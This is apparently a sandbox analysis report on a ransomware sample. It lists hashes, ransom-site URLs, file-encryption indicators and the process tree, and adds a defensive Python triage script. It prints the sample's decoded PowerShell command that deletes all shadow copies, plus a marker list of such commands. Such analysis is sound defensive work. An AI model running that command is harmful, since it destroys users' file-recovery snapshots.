Analysis
max time kernel: 154s
max time network: 130s
platform: windows10_x64
resource: win10-en-20211208
submitted: 30-01-2022 07:59
Static task: static1
Behavioral task: behavioral1
  Sample: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  Resource: win10-en-20211208
General
Target: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
Size: 114KB
MD5: 5a38c1570c196b855ef2ce54986efae4
SHA1: f792d8798fc1fc32e9cfc2cdf0f635d178e4c5a2
SHA256: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281
SHA512: 8382b88202d6a3c10dcbe971c789a2cb8d0b3b0b48bced1df8d32e89661f0262bc50b39426db2a7cfc549763c5579c203db9b2ce88186b9f75550f6dfbf4a6b8
Malware Config
Extracted from C:\3cqd8-readme.txt (the ransom note dropped by the sample):
http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/63
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/32E393E21EC88037
http://decryptor.cc/32E393E21EC88037
Signatures

Modifies extensions of user files (7 IoCs)
Ransomware generally changes the extension on encrypted files. Every rename below appends ".3cqd8", the same token used in the ransom note filename 3cqd8-readme.txt.
Process: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  File renamed C:\Users\Admin\Pictures\UnprotectLock.raw => \??\c:\users\admin\pictures\UnprotectLock.raw.3cqd8
  File renamed C:\Users\Admin\Pictures\UnblockConvertFrom.tif => \??\c:\users\admin\pictures\UnblockConvertFrom.tif.3cqd8
  File opened for modification \??\c:\users\admin\pictures\DenyStep.tiff
  File renamed C:\Users\Admin\Pictures\AddDisconnect.png => \??\c:\users\admin\pictures\AddDisconnect.png.3cqd8
  File renamed C:\Users\Admin\Pictures\DenyStep.tiff => \??\c:\users\admin\pictures\DenyStep.tiff.3cqd8
  File renamed C:\Users\Admin\Pictures\DisconnectProtect.tif => \??\c:\users\admin\pictures\DisconnectProtect.tif.3cqd8
  File renamed C:\Users\Admin\Pictures\FindSplit.crw => \??\c:\users\admin\pictures\FindSplit.crw.3cqd8
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive. The sample probes every letter A: through Z: except C:, which is the usual pattern for finding mapped network shares and removable media to encrypt.
Process: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  File opened (read-only): \??\U: \??\Y: \??\Z: \??\F: \??\J: \??\N: \??\O: \??\K: \??\R: \??\W: \??\S: \??\V: \??\D: \??\B: \??\E: \??\G: \??\M: \??\P: \??\Q: \??\T: \??\X: \??\A: \??\H: \??\I: \??\L:
Drops file in System32 directory (1 IoC)
Process: powershell.exe
  File opened for modification C:\Windows\System32\CatRoot2\dberr.txt
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Process: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\283s.bmp"
Drops file in Program Files directory (32 IoCs)
Process: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  File opened for modification \??\c:\program files\GroupUndo.tiff
  File opened for modification \??\c:\program files\JoinDeny.css
  File opened for modification \??\c:\program files\NewDisconnect.ini
  File opened for modification \??\c:\program files\SelectRestore.asx
  File opened for modification \??\c:\program files\UnlockUpdate.dxf
  File opened for modification \??\c:\program files\DisableTrace.mpg
  File opened for modification \??\c:\program files\ConvertFromConnect.easmx
  File opened for modification \??\c:\program files\DenyUnblock.crw
  File opened for modification \??\c:\program files\RestartOpen.wax
  File opened for modification \??\c:\program files\SelectConfirm.shtml
  File opened for modification \??\c:\program files\ApproveMeasure.gif
  File opened for modification \??\c:\program files\WatchOut.mp4
  File opened for modification \??\c:\program files\SplitCompare.xml
  File opened for modification \??\c:\program files\DebugCompress.WTV
  File opened for modification \??\c:\program files\ExitImport.jpeg
  File opened for modification \??\c:\program files\PopNew.tif
  File opened for modification \??\c:\program files\SuspendConvert.ADTS
  File opened for modification \??\c:\program files\BackupUnregister.kix
  File opened for modification \??\c:\program files\OutAssert.asp
  File opened for modification \??\c:\program files\SyncExpand.mp2v
  File opened for modification \??\c:\program files\WriteSkip.emf
  File created \??\c:\program files\3cqd8-readme.txt
  File opened for modification \??\c:\program files\MoveLimit.ppsm
  File opened for modification \??\c:\program files\AssertUpdate.xlsm
  File opened for modification \??\c:\program files\CheckpointCompare.dotm
  File opened for modification \??\c:\program files\GetConvert.ttc
  File opened for modification \??\c:\program files\HideProtect.raw
  File opened for modification \??\c:\program files\SetCompress.mp2v
  File opened for modification \??\c:\program files\UnpublishUnlock.rle
  File created \??\c:\program files (x86)\3cqd8-readme.txt
  File opened for modification \??\c:\program files\RenameUpdate.png
  File opened for modification \??\c:\program files\EditSave.xla
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  PID 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe (2 hits)
  PID 3176 powershell.exe (3 hits)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes:
  Token: SeDebugPrivilege        PID 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  Token: SeDebugPrivilege        PID 3176 powershell.exe
  Token: SeBackupPrivilege       PID 2752 vssvc.exe
  Token: SeRestorePrivilege      PID 2752 vssvc.exe
  Token: SeAuditPrivilege        PID 2752 vssvc.exe
  Token: SeTakeOwnershipPrivilege PID 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
Suspicious use of WriteProcessMemory (2 IoCs)
Processes:
  PID 1348 (1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe) wrote to memory of PID 3176 (powershell.exe)
  PID 1348 (1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe) wrote to memory of PID 3176 (powershell.exe)
Processes

C:\Users\Admin\AppData\Local\Temp\1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe"
  PID: 1348
  - Modifies extensions of user files
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 1348)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    Decoded (-e takes base64 of the UTF-16LE script): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    This deletes every Volume Shadow Copy through WMI so the encrypted files cannot be restored from snapshots.
    PID: 3176
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 544
  (WMI callback sink, COM-launched; consistent with the WMI query issued by PID 3176)

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 2752
  - Suspicious use of AdjustPrivilegeToken
  (Volume Shadow Copy service; its start and SeBackup/SeRestore token use are consistent with the Win32_Shadowcopy deletion above)
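The encoded PowerShell line and the "File renamed" IoCs above are the two artifacts a responder checks first. The following is an added example (not sandbox output and not the sample's code) that decodes a `powershell -e` argument the way PowerShell does (base64 over UTF-16LE), flags shadow-copy destruction in the decoded text, recovers the appended extension from the rename IoCs, and confirms the ransom note name follows the `<ext>-readme.txt` pattern. The report lines embedded below are copied from this page; the marker list, regexes and function names are assumptions of the example.

```python
"""Triage helpers for the sandbox report above (added example, not sandbox output)."""
import base64
import re

# Encoded command line exactly as shown in the process tree for PID 3176.
ENCODED_CMD = "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="

# "File renamed" IoCs copied from the "Modifies extensions of user files" signature.
RENAME_IOCS = [
    r"File renamed C:\Users\Admin\Pictures\UnprotectLock.raw => \??\c:\users\admin\pictures\UnprotectLock.raw.3cqd8",
    r"File renamed C:\Users\Admin\Pictures\UnblockConvertFrom.tif => \??\c:\users\admin\pictures\UnblockConvertFrom.tif.3cqd8",
    r"File renamed C:\Users\Admin\Pictures\AddDisconnect.png => \??\c:\users\admin\pictures\AddDisconnect.png.3cqd8",
    r"File renamed C:\Users\Admin\Pictures\FindSplit.crw => \??\c:\users\admin\pictures\FindSplit.crw.3cqd8",
]
RANSOM_NOTE_PATH = r"C:\3cqd8-readme.txt"

# Substrings that identify shadow-copy destruction in a decoded command.
# This list is an assumption of the example, not a sandbox rule.
SHADOW_COPY_MARKERS = ("win32_shadowcopy", "vssadmin", "shadowcopy delete", "delete shadows")


def decode_powershell_encoded(b64: str) -> str:
    """powershell -e / -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")


def flags_shadow_copy_deletion(command: str) -> bool:
    """True when the decoded command both names shadow copies and deletes them."""
    lowered = command.lower()
    return any(m in lowered for m in SHADOW_COPY_MARKERS) and "delete" in lowered


def appended_extension(rename_iocs) -> str:
    """Return the single extension appended across all 'File renamed A => B' lines.

    Raises if the renames do not agree on one extension, which would mean the
    lines are not the uniform pattern ransomware produces.
    """
    exts = set()
    for line in rename_iocs:
        m = re.search(r"File renamed (.+?) => (.+)$", line)
        if not m:
            continue
        src_name = m.group(1).rsplit("\\", 1)[-1].lower()
        dst_name = m.group(2).rsplit("\\", 1)[-1].lower()
        if dst_name.startswith(src_name + "."):
            exts.add(dst_name[len(src_name) + 1:])
    if len(exts) != 1:
        raise ValueError(f"expected one appended extension, got {sorted(exts)}")
    return exts.pop()


def note_matches_extension(note_path: str, ext: str) -> bool:
    """Check the '<ext>-readme.txt' naming seen in this report."""
    return note_path.rsplit("\\", 1)[-1].lower() == f"{ext}-readme.txt"


def triage() -> dict:
    """Run all checks on the embedded report lines and return the findings."""
    decoded = decode_powershell_encoded(ENCODED_CMD)
    ext = appended_extension(RENAME_IOCS)
    return {
        "decoded_command": decoded,
        "shadow_copy_deletion": flags_shadow_copy_deletion(decoded),
        "appended_extension": ext,
        "note_matches_extension": note_matches_extension(RANSOM_NOTE_PATH, ext),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

The decode is the same for any `-e`/`-EncodedCommand` argument, so the first function can be pointed at other process-tree lines as-is; the extension check assumes the rename IoCs keep the original filename intact and only append a suffix, which is what this report shows.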
Network
MITRE ATT&CK Enterprise v6
Downloads
Memory dumps, all taken from powershell.exe (PID 3176); sizes follow from the address ranges:
  memory/3176-120-0x000001E871850000-0x000001E871872000-memory.dmp  136KB
  memory/3176-121-0x000001E871900000-0x000001E871902000-memory.dmp  8KB
  memory/3176-122-0x000001E871903000-0x000001E871905000-memory.dmp  8KB
  memory/3176-127-0x000001E873C30000-0x000001E873CA6000-memory.dmp  472KB
  memory/3176-138-0x000001E871906000-0x000001E871908000-memory.dmp  8KB